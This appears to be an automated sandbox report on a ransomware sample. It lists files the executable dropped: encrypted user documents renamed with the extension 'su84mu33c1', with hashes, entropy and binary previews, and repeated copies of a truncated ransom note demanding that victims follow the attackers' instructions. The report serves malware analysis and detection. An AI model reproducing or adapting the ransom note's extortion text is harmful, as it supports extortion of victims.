          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Documents\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844143453843308
          Encrypted:false
          SSDEEP:24:5pthdeDmVmDl87cedyXNoBQnkATxFcgRwrqRS7HXADn+zpQ2:3thcqel87c4goBYTxheqRS73u+Vl
          MD5:ABA9749CF91053EA978CBB5B839782FD
          SHA1:88C4553C716C39E58B3927862DA811CBC1F84C20
          SHA-256:92E1C5DD49E9DC24917B4F41A8E65208DFC0F5E09420FF6800EDDFB116B99562
          SHA-512:A0200096C66C192C5EA2CEDA4D20CF5E109F17A61F99E884978D6D452FA481BE82BC1CA23319A023908589C3AFC6AB82118E4B943F264F99BF28E422F0CBF3E2
          Malicious:false
          C:\Users\user\Documents\EEGWXUHVUG\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Documents\EOWRVPQCCS\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Documents\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.889439367840137
          Encrypted:false
          SSDEEP:24:qigrdEJN52hYmhGRuINSvq6KaalQJXe20NqL0+z3p2OiiVtFLTtrEUXADn+zmUbe:qVJEJNMhgSC6Kal2qL0cxptV5Lu+He
          MD5:D4F1CC337B40AC8EF194D08979547677
          SHA1:F8C89ED5BE2EB73B23CB4D6F07429933E9209840
          SHA-256:4A2849D40C0B441BFA149F81FBCFBDFA0ADA675F13FFD20B0AB8BD39C6B064D9
          SHA-512:5A23CB6211519C480FF4496437A87CDEC67FCD2F6232CF17E70139E8DA2F99C90B1CDC7517CA9DD259FE2EFADB1CEB8FB513DE54A335A41CB1F52D56A1F0F436
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.84752327604628
          Encrypted:false
          SSDEEP:24:ifOaPxA/PFG3HPsE6XtcUq11/igdPdF+aZoeCupJkT9uAzpkQhqKhwXADn+zVFVY:am/w3vRytctDpZo7cWYikiIu+jVY
          MD5:8A7645898367089DFF84E803AA235D08
          SHA1:5FAF7F2D26780B440E3685CE44F4EF3F300E62AE
          SHA-256:379B1F2584E6263F86AE4E3E3D18E2AFCD21ACCA23759B37878760C0D42880C6
          SHA-512:643021B2955606FC183BD395C7661CAF8C6E7CB3DF2FE43486AE4C93ED7DC06A7A0FB53BA070FDB1234F9CFECDDC4B51FFA6ACBDD2255FC2E9E6CADFE0D5BC58
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862212854272136
          Encrypted:false
          SSDEEP:24:DbH8LcfygL54m9IEKa+Vy4B/jS+bXe6JV9vH21m3Yah1pXADn+zJOe:DIHkLIVa+Vy4B/g6r99rhDu+1X
          MD5:7892913D011AB300283BA51D9725D9B1
          SHA1:488DF744858D4E7038FAE08907B81E16C58D7902
          SHA-256:C98C65F49DE250837EA7BA6A29C91B8DF933BBDA9D909309A11377D1385ACB71
          SHA-512:0C07456C9C454B29D17BB072CE83BF5C56291C6E8957782ECE65606F9786461837C11A5C8960DD10988A348F7C4FE9B06A15664721C46AC560DCEC008B5A1A2B
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844142609478651
          Encrypted:false
          SSDEEP:24:bdSAt2qeavZhWAUJZw58W7gyxXpSWnW9aLGzXQM1cuIhzN4tvn8XADn+zzpYI:b1CJZwiYpSyWBXQM1Z1nsu+vSI
          MD5:1A291C914DF600705BFD0856F6DBADF0
          SHA1:3EDB8A7758F60FBD1E53F9EBA8A45CFDDEEA71AB
          SHA-256:A7548BFA1E0C04AE6A421D4C1B4510869F33EA1AC7DAE9D9985F38F66E3466E2
          SHA-512:CFFF6CDE23FDC6A9231A8B1FE3F2802D39E3C96FB928020AE989BF59A3079CD78C47509A651F284F023229BD2A0C6E4FCBC952110E6B5BF56D9CE42447A701AE
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.842064287025823
          Encrypted:false
          SSDEEP:24:nf+1v/5TUBgayfy0A2Yv/6lUKvO1IyUkHr9GjdXcPFrlsQ9rXADn+zxA9Ab:Gx/5TUBg/f4v/6l2IyUK9GjsFZsAu+Vd
          MD5:AF9E181F29AF3C74302FD7A946C7640A
          SHA1:B98CCEB7FD75F8E64660DCE30BFEDD09661DDFBA
          SHA-256:A46C01E8B2838B27FA7B27B4C8EE4BD286B7A42307245F96D1743B7366FB4D65
          SHA-512:02AEF2B6E1281D9E72BF99E3740A24952F3D7D9DCFE6D57A694923E6908147355AF90C90B259AF54478053F8918925C04D8A3D601CC7E330A1EC1D03DC961C77
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862238488174111
          Encrypted:false
          SSDEEP:24:6mTPEptWlEaxBaaHdrMzhvsKuTZ8y258LSX1uRihdj1K9Stym17X5AfXADn+zyU:9TPOAaaOCTe15KS0RudjkafGfu+WU
          MD5:2AB6F3AE6CFA980830EF8D4BC89AF5DC
          SHA1:471A9780E00B5F96FA961EC3649C775704A6D89E
          SHA-256:E6E661D8A2C789764AC4A85F319CBE0D38773F30FCD96C780370CD91452D111E
          SHA-512:10EDB515A6FB0EEAF0CA2192915D3C4DB486501E5306BCA5489AF6448D9281906B080DCF8D974B5233DBE787A8CB4D6039679F3F71851063EBDBB42D8C9B1404
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.84814013749099
          Encrypted:false
          SSDEEP:24:MDPLPJjMNdwrRIhtHZL5lc3HaqZfpadWIy27OHAcKXADn+zBNi5:MTLxANGrRIht5zC6UadWIy2igcWu+dNS
          MD5:DD9FEB2F8AE76C1A90362235C24018BA
          SHA1:222CE42C9BDFE702167C6752ED5D9F08C6A9C0DC
          SHA-256:D774A313BF60ADFCA447920981B199C277194CF1CF502205DC8FC10DECDF1431
          SHA-512:4F9DA415BC51AF8E778F8F325793281FE4415BE29CB663E321FBBD86A6AD4043752D7BBF94718F5F8A0AC4603B642DEDAF330CBD9814B5B6429ACB9005AB8598
          Malicious:false
          C:\Users\user\Documents\FENIVHOIKN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Documents\GIGIYTFFYT\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Documents\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.810467526366943
          Encrypted:false
          SSDEEP:24:gNKFKpCQ1Pa95EwI7Xhwhep/kfzg/pfUyqbMvAfU04d0XADn+zib:gNLIywsXK7zKhgCAx4Ku+2
          MD5:A24EB03ECF86A351E7CC677F41B27BD7
          SHA1:6B9A759BE75D441C3832EBE2E8C8677ED3572751
          SHA-256:5754048222547EF3456373900C7C55E8A02A495D9121915F39A527021716C540
          SHA-512:CEC6ECF2C63B409AE7BE2165D114C14054C64D882101222D21876272E445F2DBDFA6F46149D8ED7949B87A7B2E069B8AF288F37BAF355AC94C15635C2B1F38A7
          Malicious:false
          C:\Users\user\Documents\GRXZDKKVDB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.857462494691937
          Encrypted:false
          SSDEEP:24:mijEDpntjmOt+PvQgdpp+KmEOCXZSoQGFbqRCc4jFIDEXADn+zF:mTtj3t+nQOmEhdJ+Dku+B
          MD5:F4AC99DE8D2DBD88D9EBCD8DC7193BB4
          SHA1:6A49EDE625523A65C350C4B41DCC35C5A507207D
          SHA-256:AADBB3A7627106B2ABB052B252031BF4005ED2456A623054406938A62D888520
          SHA-512:22D910B09A75478AC2A0A6E34E75E35677943F4066F3D444BD05531E2EDF46C0ECF94BD3C109E73377F2CBA2E6046825F090C9008C331EBC10B8DC3E9D1CF330
          Malicious:false
          Preview: ...u..8.n..X...K......!...z.D.U.,...H.A..3Fs.._.=o1u....R.M....e._.3T).t.....WH...hO...H......h....I.y.^\..^.G.xo........T.....I.0.M.......t......... ..JQ...0B.[,@ .p.r...h?m..j...Y..U..=.S..S...6.>..3...S.d.....)W..@g;.>.!.)..D...H].........<3.}..l.tq..Z.*. O..S.3.Ao..VD.4WR......3`.T..|..?..l#......a..6h!..:.;.P4P.FX..:....eY..hFW...p....6):.{.K......D..e.)....[1.%%.L"7.G..>.\..q.HIO!BR...q..I@D5y.x;.N./...&..2.>......cwd...q.y0...8..uG..^m.d.i.'4...e.'.....&=1...Z..X..5"'.....dN.7@.n....0.j...2.d..A.D.n+-+r.....Q..&.;.w..*.>...=F.\.&......`......<.i0BM9.M.KV.|m.J........o...P......h&....h.8j...[......a.|.x.p...]......cd..EC1.x}..95M...q... ..y..1..|4........v...3x...../H..8y..U...._.)3...#K*..&."0.......yO....Fz.......R......l....$G......y.U.%.......8..E.^.....g<....U...J.Dd.k.U...mn/)wL...W..]..5K4........^..H..#.z/...|....e.p...9."7.....Jb.N......y...s:p...w..W.._A..]&....~......%....CT..6R.C..31.$..!.#H.0.^+.a.>.vg.QJ!.K..5......r.
          C:\Users\user\Documents\MXPXCVPDVN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.860656422681623
          Encrypted:false
          SSDEEP:24:xXQgNZOQJBmH2UfYZ46TH5ri2ovgSWeFKbHM4sX0x8ihRn38V60MBXADn+zCaO:RDNIPLYOOH42Qg8FKbHMNK8ihRSMFu+6
          MD5:059B2D3EABC50A958EA0CC17ECBAE4A2
          SHA1:4B1DEB8BA9C937B86BF53BBD623453860BAD1AE3
          SHA-256:E10E286C57C61840B8E493997C06D1392BF39C3DF9E72001AC40370C6E7913B0
          SHA-512:A8A8AB27C6DB0D0900B2EA603B193A8C8F85C0E1915E8C3DB1CD71F89B2793BEF636BB13F5A90C01E7CE4CE818EE9FDB7A55FF2A5972549F80921495FA7B0923
          Malicious:false
          Preview: /z......j...K<5P.Z..O.T...d.61{.F...\%...j.Z.@........<.0..$w\.G....V.w`.Z......./2.....&...[...A...V.....3\m.2.P.X ....w..sR@..( ...TJ-.....(.....J.;..j....$.$4FUyU#.......,..D...Y.....b..@,.......^M......|...>*....p.h#..X.... v...*.nn.....e..3.P?$~Z...jZ...X.|..J".6.^.."Uz....'...a.f.G._!..aO?.A ..%^p......."....;.xUO...B`.:.......w...d....Q.....9.0...j.;..[.........3Xw...?....5E..i8f......a.#P..k...P...._j.1...8K..R........[#6...2..K.3...\9(/.(..fKr\$b.WO..l....pR..P.m.Y..)...B.o....I....ye....w.Qu...3.k.....>.i.........o1..7.......a[.{..x.G9.......jj.<x.....#R...F8..H....c....m..Cu$A.....q..j.|.H..6ak..Y.ts....yKv.......j...x.... ./.......r......]...^........"..b'.c.1..q..i`y......siU#Q.g.....xRY.}..'.!....&...H........2d=.:.'.....[...G..tx.l_ODd..q........q...v..Hy..[..Wa...<...c......=.A.._7.g.B...D..7....:!..MW......LomB......:7.!R..t......@.??..N.Px49z..+Yk......{.4S.l.3....?F.N..DM.Z>8..*.7......I....,.b;.@....!.w.....I...R.=...
          C:\Users\user\Documents\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854666274388066
          Encrypted:false
          SSDEEP:24:QaZJVbgD/32HE5dxfMpBxDHG0n9OwlE7WXxu+aL8na+QCTAFRzpxrJjvXADn+z1Z:PZJV8/sIEDxD3M4JKL8n4Csbp3u+r
          MD5:E4F0767D18BEA7862163E8E028D3E8D4
          SHA1:A5F3FE349244B191E46AE0FD76FF32B01DB3D240
          SHA-256:78EC44D60EA3CF1365C5F8EC6BC8739D30C7DD28FF1BB1B844B87116B2FA64C4
          SHA-512:4AEE5A0557C0BDCBEB9459C39533E86AD0FF21788957AB7E1670C53E31759DE302AB64FF9753B72E75E4BAAB8E5C9DC1768BF3F33B2C8DD886E387511FCF5426
          Malicious:false
          Preview: ..l..PJSx.7..q<.)....$|...$.x..)...)....e'.K.`.RJ..+H.p...8.Hf;......T.j.......... ..D7....O....#.+`.d.*..:9..^.c`...].x.....E.....18....<d*...rQ/E...M+/cE.....1m4.M.m....4..F[.`...X..<(X.A...!....xU..4J....y..(.".:.B.D.$....'......J\.oAU"s.t!.v.u...FCa[;.....LN7{x"...g3q9cj..@.|..D.....gV...sA./WR4.Q.s8..t...R....N..k.,..1L...\..K.{.>.....~...u....7.Vo.~W.....8.-.?.~....8...'].&.......m....iqXY(......7.D...1.#.MF.&\6Ik..Z..).d......K.$$......Hx..AB.n:.......^Lv.!.....j&...9.......p.._[\h.k.ew.&L.e.w..J.o...Y?z.....R..`......C+.N.....8R...b....p,..p.!..N..M.%....b.!rU.}o.m..Q(...^. ..n.+."...(...s.S...N@....&|..d.ss..%......}.....]..k3...3.........X4."k...o..we^.....LM....S.y.....k".!...y.....a~.|...r.X..a.j.....5.#z./n.....O..u.y.....P..r....`.@a.D*.zq*..cv...<V1|......I.....@...=d..qX...!^..R...o.;.q...a.)<........h..T.{."...xT..(.6)>w..W.=U<[...(....b..a.D.A...-.^.t....SR.7..*...z.$.......o}.c....=5.~...C.H..V:.....Y.c..Y.nA.Q..b.N.h
          C:\Users\user\Documents\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.853947184755314
          Encrypted:false
          SSDEEP:24:oZlU6SLQhue0bFmDX+j+zM1cjowTpnsxiDXEYNhodHXADn+zJnEZk:oZlU6SkhueY0DOiAi1PoJu+NEZk
          MD5:EB914CA499A8BFFCCF003738A90E24BA
          SHA1:9D1A6FFE41142F8ABD5D80D39E044C7048ED2908
          SHA-256:26E87698FA9D8312BC523CDAD4222ED31C8D53E541443B645E97301A8D781ED6
          SHA-512:5A2F453AA5C1226F73E3C193BA704CEFD507ABF69C6480FC3F91CF7DC35A9BA7DDE40BBD543ECA5617C306AAF6E7EDFD9BF666A821AB8EC994E517742669DAE1
          Malicious:false
          Preview: w>..wR..y...#.V-...U..gB.e..;>..<.....`......<.?.S.S.....O.h./'l.c..R..!".R...-n.."...X...b..p....z..(.tM..x.....L.J..Z.S:..N...B5.d......f7Q...s9....:EC.4... Kx..v.!0Q....!..H......3,....9r..G....;._N....\V.-.g.C...&8f..n..@.......N..\g..9.J.x..}...,A..R7.H.h'\..._...<.......(.p.].!.D....'.?0f...z}....-..|i...E_..'{.3..f%g..q+D.......Y..u...*.n....z~m.........":..[C...`w.{.U,b..+.q.9dP..y.Ra7..W....Fo......7..jD.:...Y...Q.F..)Ua.8V#.#F<JJ.......w...U.;..-.#.k.....5.'.5~..bx.dVj...t.d.X..*^.<.V....X..;.UJ..........+.....li)..)uMj.]M.......!k..e"4..;/.(..B.m.*$._.. {z.\.Y...[.w.(.b./.-.....i..&.....1ya.\.kv.5..'R..f..cw.(.'%....u...6.=.....Z.P.a....}..C...iT..."......^...Ru...2../.v...O........yS4[...(....u..!)..)l..G....W.=..t..>..0.#.8.).X..q.......C..C.5.R.."..m.a..3..:...a...UT....H...&.....6.......0.LtI..k.CiB....,.)4.,2"........t.1.F....A..[.<.nw/.?...4....n...mF/.r....R.d..!.aL....Ru..?$...:E.w.-.24b~.....&7........e|.q.....x
          C:\Users\user\Documents\PWCCAWLGRE\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. 